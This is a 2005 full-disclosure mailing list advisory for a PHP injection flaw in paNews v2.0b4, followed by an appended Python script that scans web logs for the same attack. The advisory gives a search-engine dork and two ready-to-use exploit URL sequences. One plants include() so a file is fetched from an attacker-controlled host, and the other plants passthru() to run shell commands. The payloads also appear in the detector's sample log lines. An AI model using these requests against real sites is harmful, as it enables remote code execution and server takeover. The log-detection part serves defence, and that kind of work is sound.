From: tjomka at navigator.lv (tjomka)
Subject: paNews v2.0b4 - PHP Injection





oooo   oooo oooooooo8 ooooooooooo
 8888o  88 888        88  888  88 
 88 888o88  888oooooo     888     
 88   8888         888    888     
o88o    88 o88oooo888    o888o    
********************************
**** Network security team *****
********* nst.e-nex.com ********
********************************
* Title: paNews v2.0b4
* Bug found by: nst
* Date: 20.02.2005
********************************

web: http://www.phparena.net/panews.php
google: allintitle:paNews v2.0b4

PHP Injection
Bug works only if:
1. register_globals=On
2. folder "includes" is writable

p.s. please disable - javascripts =-]

Example 1

http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)

then:

http://victim/panews/includes/config.php?nst=http://your/file.php


Example 2

http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)

then:

http://victim/panews/includes/config.php?nst=id
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: paNews_v2.0b4.txt
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050221/ed7e8b42/paNews_v2.0b4.txt
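A defensive check for the request pattern in this advisory, added here as an example and not part of the original post: it scans access-log lines for direct requests to includes/admin_setup.php that set `access` from the query string, trigger `do=updatesets` or carry PHP-looking values, and for includes/config.php being called with parameters. The Apache common log format, the sample lines and the finding labels are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache common log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [21/Feb/2005:10:00:01 +0000] "GET /panews/index.php?page=2 HTTP/1.1" 200 5120
192.0.2.66 - - [21/Feb/2005:10:02:13 +0000] "GET /panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&showcopy=passthru($nst) HTTP/1.1" 200 311
192.0.2.66 - - [21/Feb/2005:10:02:20 +0000] "GET /panews/includes/config.php?nst=id HTTP/1.1" 200 54
192.0.2.11 - - [21/Feb/2005:10:05:00 +0000] "GET /panews/includes/config.php HTTP/1.1" 200 0
192.0.2.67 - - [21/Feb/2005:10:09:41 +0000] "GET /panews/includes/admin_setup.php?access%5B%5D=admins&do=updatesets&showcopy=include%28%24nst%29 HTTP/1.1" 200 311
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')
# A PHP variable ($name) or a function-call shape (name followed by "(").
PHP_CODE_RE = re.compile(r'\$[A-Za-z_]\w*|\b[A-Za-z_]\w*\s*\(')

def classify(url):
    """Return finding labels for one request URL (empty list if clean)."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)  # percent-decodes
    path = parts.path.lower()
    findings = []
    if path.endswith("/includes/admin_setup.php"):
        names = {k.split("[")[0] for k, _ in params}
        if "access" in names:  # auth variable supplied by the client
            findings.append("access-set-from-request")
        if any(k == "do" and v == "updatesets" for k, v in params):
            findings.append("settings-update-direct")
        if any(PHP_CODE_RE.search(v) for _, v in params):
            findings.append("php-code-in-value")
    elif path.endswith("/includes/config.php") and params:
        findings.append("config-called-with-params")
    return findings

def scan(log_text):
    """Return (client, url, findings) for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            findings = classify(m.group(2))
            if findings:
                hits.append((m.group(1), m.group(2), findings))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The two preconditions the advisory lists (register_globals=On and a writable "includes" folder) are the host settings to check alongside the logs.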
